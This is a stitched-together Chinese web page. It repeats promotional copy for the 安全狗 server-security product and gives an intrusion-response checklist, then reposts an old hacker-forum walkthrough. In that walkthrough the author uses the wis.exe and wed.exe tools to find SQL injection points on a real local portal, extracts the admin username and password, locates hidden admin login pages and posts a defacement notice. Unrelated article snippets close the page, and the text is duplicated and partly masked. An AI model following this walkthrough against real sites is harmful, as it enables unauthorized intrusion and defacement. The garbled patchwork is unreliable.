驱动级保护,拦截更快速,有效防止未授权的非法用户登录服务器,实时阻止非法创建和修改系统帐号。
服务器安全加固,避免配置风险
全面的服务器体检,暴露安全隐患,当前系统健康情况了然于心,同时提供贴心的优化建议措施,加固服务器更简单,系统运行更快速,更安全。
这款服务器防入侵软件在市场上非常受欢迎,并且也是目前市面上为数不多的免费良心产品,有需要的朋友可以自行下载使用,如果对于服务器安全有更高的需求也可以联系安全狗专门定制服务。
目前市面上防止服务器入侵软件还是比较稀少的,普通的电脑杀毒软件又无法满足服务器安全的日常防护工作,这里给各位服务器运维人员介绍一款防止服务器入侵软件,以便减轻大家的日常工作。
服务器安全狗,永久 *** :
多引擎,精准查杀网页木马、各类病毒
独有的安全狗云查杀引擎、网马引擎与专业的二进制病毒引擎结合,精确查杀各类网页木马和主流病毒。多引擎智能查杀病毒,全面保障服务器安全。
三层 *** 防护,实时保护 *** 安全
强有力的 *** 防护,实时监测IP和端口访问的合法性,实时拦截ARP攻击、Web攻击(抗CC)、DDOS攻击、暴力破解。
全面的文件/注册表保护,杜绝非法篡改
全面开放保护规则,同时支持监控网站目录,有效保护重要文件、目录与注册表不被篡改与删除,实时防止网站被上传网页木马。系统默认规则与用户自定义规则全支持,灵活定制,全面保护。
底层驱动防护,屏蔽入侵提权
驱动级保护,拦截更快速,有效防止未授权的非法用户登录服务器,实时阻止非法创建和修改系统帐号。
服务器安全加固,避免配置风险
全面的服务器体检,暴露安全隐患,当前系统健康情况了然于心,同时提供贴心的优化建议措施,加固服务器更简单,系统运行更快速,更安全。
防止服务器入侵软件就目前市面上的产品来说,只有安全狗是做得更好的,足够满足服务器的一些日常防御工作,如果说您的业务 *** 比较庞大,需要有专门的服务器安全定制服务,也可以和安全狗联系,我们会根据您的需求专门定制服务。
服务器入侵防御工作应该是最让运维人员头疼的了,目前服务器入侵的方式非常多,一旦遇到入侵就需要去一一做排查,既花精力又费时间,这里跟大家介绍一款服务器入侵防御软件,帮助大家做好服务器安全工作。
服务器安全狗,永久 *** :
多引擎,精准查杀网页木马、各类病毒
独有的安全狗云查杀引擎、网马引擎与专业的二进制病毒引擎结合,精确查杀各类网页木马和主流病毒。多引擎智能查杀病毒,全面保障服务器安全。
三层 *** 防护,实时保护 *** 安全
强有力的 *** 防护,实时监测IP和端口访问的合法性,实时拦截ARP攻击、Web攻击(抗CC)、DDOS攻击、暴力破解。
全面的文件/注册表保护,杜绝非法篡改
全面开放保护规则,同时支持监控网站目录,有效保护重要文件、目录与注册表不被篡改与删除,实时防止网站被上传网页木马。系统默认规则与用户自定义规则全支持,灵活定制,全面保护。
底层驱动防护,屏蔽入侵提权
驱动级保护,拦截更快速,有效防止未授权的非法用户登录服务器,实时阻止非法创建和修改系统帐号。
服务器安全加固,避免配置风险
全面的服务器体检,暴露安全隐患,当前系统健康情况了然于心,同时提供贴心的优化建议措施,加固服务器更简单,系统运行更快速,更安全。
在目前的软件市场上,服务器入侵防御软件是非常少的,其中安全狗的产品应该算是其中的佼佼者,而且还能 *** ,对于一般的中小型企业是非常便利的。当然,如果您有更高的服务器安全需求,也可以向安全狗咨询,我们会给您专门定制服务,帮您解决一切服务器安全问题。
目前使用阿里云服务器的人非常多,很多人以为用了阿里云服务器安全就有保证了,其实不然,阿里云服务器也有被入侵的危险,这里跟大家讲解一下阿里云服务器被入侵怎么办。
首先,安装服务器安全狗,服务器安全狗能够帮助用户排查入侵的漏洞,修复漏洞,查杀病毒等,功能十分强大,先用服务器安全狗对阿里云服务器全体检查一遍,做好修复工作。
服务器安全狗,永久 *** :
多引擎,精准查杀网页木马、各类病毒
独有的安全狗云查杀引擎、网马引擎与专业的二进制病毒引擎结合,精确查杀各类网页木马和主流病毒。多引擎智能查杀病毒,全面保障服务器安全。
三层 *** 防护,实时保护 *** 安全
强有力的 *** 防护,实时监测IP和端口访问的合法性,实时拦截ARP攻击、Web攻击(抗CC)、DDOS攻击、暴力破解。
全面的文件/注册表保护,杜绝非法篡改
全面开放保护规则,同时支持监控网站目录,有效保护重要文件、目录与注册表不被篡改与删除,实时防止网站被上传网页木马。系统默认规则与用户自定义规则全支持,灵活定制,全面保护。
底层驱动防护,屏蔽入侵提权
驱动级保护,拦截更快速,有效防止未授权的非法用户登录服务器,实时阻止非法创建和修改系统帐号。
服务器安全加固,避免配置风险
全面的服务器体检,暴露安全隐患,当前系统健康情况了然于心,同时提供贴心的优化建议措施,加固服务器更简单,系统运行更快速,更安全。
在使用完服务器安全狗对阿里云服务器进行一遍排查之后,再来进行下面的工作。
(1)查看日志信息是否还存在或者是否被清空,入侵者可能会删除机器的日志信息。
(2)查找系统是否包含隐藏账户
(3)查看机器最近成功登陆的事件和最后一次不成功的登陆事件。如果是windows服务器,可以查看Windows日志等。
(4)查看机器当前登录的全部用户。
(5)查询服务器异常流量。
(6)如果数据库被入侵,查看数据库登录日志等,如Sqlserver数据库支持设置记录用户登录成功和失败的日志信息。
(7)查询异常进程所对应的执行脚本文件。
(8)检测系统中的文件是否被删除或者更改。
(9)可以安装服务器杀毒软件进行扫描查杀,一定要注意别被杀毒软件误杀。
(10)网站安全漏洞等其他方面。
阿里云服务器被入侵怎么办,只需要通过上面介绍的详细步骤一个个完成,那么只要你遭受的不是非常强大的入侵,都能保证服务器安全无忧,如果真的遭受到强大的入侵而导致服务器数据、程序被完全破坏,可以向安全狗咨询,我们会帮您解决。
原贴:
说起流光、溯雪、乱刀,可以说是大名鼎鼎无人不知无人不晓,这些都是小榕哥的作品。每次一提起小榕哥来,我的崇拜景仰就如滔滔江水,连绵不绝 ~~~~(又来了!) 让我们崇拜的小榕哥最新又发布了SQL注入工具,这回喜欢利用SQL注入入侵网站的黑友们有福了。小榕哥的工具就是强!偶用它来搞定我们本地的信息港,从 寻找注入漏洞到注入攻击成功,通过准确计时,总共只用了3分还差40秒,呵呵,王者风范,就是强啊!不信吗看看我的入侵过程吧。
一、下载榕哥的工具包
小榕哥的这个SQL注入攻击工具包在榕哥的站点可以下载到,不过这个工具太火爆了,下载的人实在太多,你觉得慢的话,可以到其它大的黑软站点搜索一下,绝对可以找到的。
下载来的这个工具包中总有两个小程序:"wed.exe"和"wis.exe",其中"wis.exe"是用来扫描某个站点中是否存在SQL注 入漏洞的;"wed.exe"则是用来破解SQL注入用户名密码的。两个工具的使用都非常简单,结合起来,就可以完成从寻找注入点到注入攻击完成的整个过 程。
二、寻找SQL注入点
"wis.exe"使用的格式如下:"wis.exe 网址",这里以笔者检测本地信息港为例:首先打开命令提示窗口,输入如下命令:"wis.exe "(如图1)。
小提示:在输入网址时,前面的"";和最后面的"/"是必不可少的,否则将会提示无法进行扫描。
输入完毕后回车,即可开始进行扫描了。很快得到了扫描结果,可以看到这个网站中存在着很多SQL注入漏洞(如图2),我们随便挑其中一个来做试验,就挑"/rjz/sort.aspclassid=1"吧。
打开浏览器,在地址栏中输入"",打开了网站页面,呵呵,原来是一个下载网页(如图3)。现在来对它进行SQL注入,破解出管理员的帐号来吧!
三、SQL注入破解管理员帐号
现在进入命令窗口中,使用刚才下载的工具包中的"wed.exe"程序,命令使用格式为:"wed.exe 网址"输入如下命令:"wed.exe "。回车后可看到命令运行情况(如图4)。
小提示:这次输入网址时,最后面千万不要加上那个"/",但前面的"";头也还是必不可少的。
可以看到程序自动打开了工具包中的几个文件,"C:/wed/wed/TableName.dic"、"C:/wed/wed/ UserField.dic"和"C:/wed/wed/PassField.dic",这几个文件分别是用来破解用户数据库中的字表名、用户名和用户密 码所需的字典文件。当然我们也可以用其它的工具来生成字典文件,不过想想小榕哥以前出的"黑客字典"那么的强大,还用得着去多此一举吗
在破解过程中还可以看到"SQL Injection Detected."的字符串字样,表示程序还会对需要注入破解的网站进行一次检测,看看是否存在SQL注入漏洞,成功后才开始猜测用户名。
开始等待吧!呵呵,很快就获得了数据库表名"admin",然后得到用户表名和字长,为"username"和"6";再检测到密码表名和字长,为"password"和"8"(如图5)。看来用户的密码还起得挺长的呢,如果手工破解出这个用户密码来,一定要花上不少时间的!
正想着手工注入会有多困难时,"wed.exe"程序已经开始了用户名和密码的破解。很快的,就得到了用户名和密码了——"admina"、"pbk&7*8r"(如图6)!天啦,这也太容易了吧!还不到一分钟呢
四、搜索隐藏的管理登录页面
重新回到刚才的软件下载页面中,任意点击了一个软件下载链接,哎呀怎么可以随便下载的呢!不像以前碰到的收费网站,要输入用户名和密码才可以下载。看来这是免费下载的网站,我猜错了攻击对象,不过既然都来了,就看看有没有什么可利用的吧
拿到了管理员的帐号,现在看来我们只有找到管理员登录管理的入口才行了。在网页上找遍了也没有看到什么管理员的入口链接,看来还是得让榕哥出手啦!
再次拿出"wis.exe"程序,这个程序除了可以扫描出网站中存在的所有SQL注入点外,还可以找到隐藏的管理员登录页面。在命令窗口中输入 "wis.exe /a"(如图7)。注意这里输入了一个隐藏的参数"/a"。
怎么会扫描不成功呢呵呵,原来这是扫描注入点,当然不能成功了,管理员登录页面只可能隐藏在整个网站的某个路径下。于是输入"wis.exe /a",对整个网站进行扫描。注意扫描语句中网址的格式。程序开始对网站中的登录页面进行扫描,在扫描过程中,找到的隐藏登录页面会在屏幕上以红色进行显 示。很快就查找完了,在最后以列表显示在命令窗口中。可以看到列表中有多个以"/rjz/"开头的登录页面网址,包括 "/rjz/gl/manage.asp"、"/rjz/gl/login.asp"、"/rjz/gl/admin1.asp"等。就挑 "/rjz/gl/admin1.asp"吧,反正这些都是管理员登录的页面想用哪个都可以。
在浏览器中输入网址" ",呵呵,出现了本来隐藏着的管理员登录页面(如图8)。输入用户名和密 码,就进入到后台管理系统,进来了做些什么呢当然不能搞破坏啦,看到有一个添加公告的地方,好啊,就在这儿给管理员留下一点小小的通知吧!
看看最后我更改过的主页,冰河洗剑的大名留在了信息港上(如图9),不过可没有破坏什么东西啊!我和网页管理员也是朋友,他会原谅我这个小小的玩笑吧!
电脑软件不能卸载怎么办?Win7系统安装软件后却无法卸载该如何解决?下面就给大家分享遇到电脑软件无法卸载的解决方法。 一、没有权限卸载软件 造成Win7系统中软件卸载不了的原因有很多,不少用户...
最强蜗牛红龙蛋怎么获得?在游戏中我们向神龙许愿达到指定的次数就会得到一个红龙蛋,得到这个蛋之后我们还需要对其进行孵化。下面就是最强蜗牛红龙蛋孵化方法和具体的操作流程,大家一起来看看吧! 最强蜗牛红...
经常使用或者接触pdf文档的朋友应该都知道pdf文件不能编辑的这一特点,有的pdf文件甚至不能打开,那么遇到这样的情况我们该怎么办呢?下面一起看看pdf文件怎么打开以及如何编辑pdf文件的方法。 一...
本文目录一览: 1、《黑客帝国》从哪些电影来 2、黑客帝国 3、《黑客帝国》一共三部,这三部曲中哪一部最好看? 4、里重要场面都安排下雨而且是晚上,用意何在? 5、黑客帝国主演 6...
蚂蚁庄园小课堂5月12日的问题和发生灾害自救有关,当地震时,我们应该如何自救呢?小鸡宝宝考考你地震发生时,躲在什么空间里自救存活率较高?答对可以领取80g小鸡饲料。快来一起看看今天的蚂蚁庄园答题答案吧...
手机微信能查出和谁常常闲聊吗 许多盆友亲自相信自己,想要知道微信恢复微信聊天记录的方式,编写也了解手机微信的微信聊天记录对许多盆友而言是很重要的,可是很多人不清楚怎样一不小心地删掉,如何恢复,随后...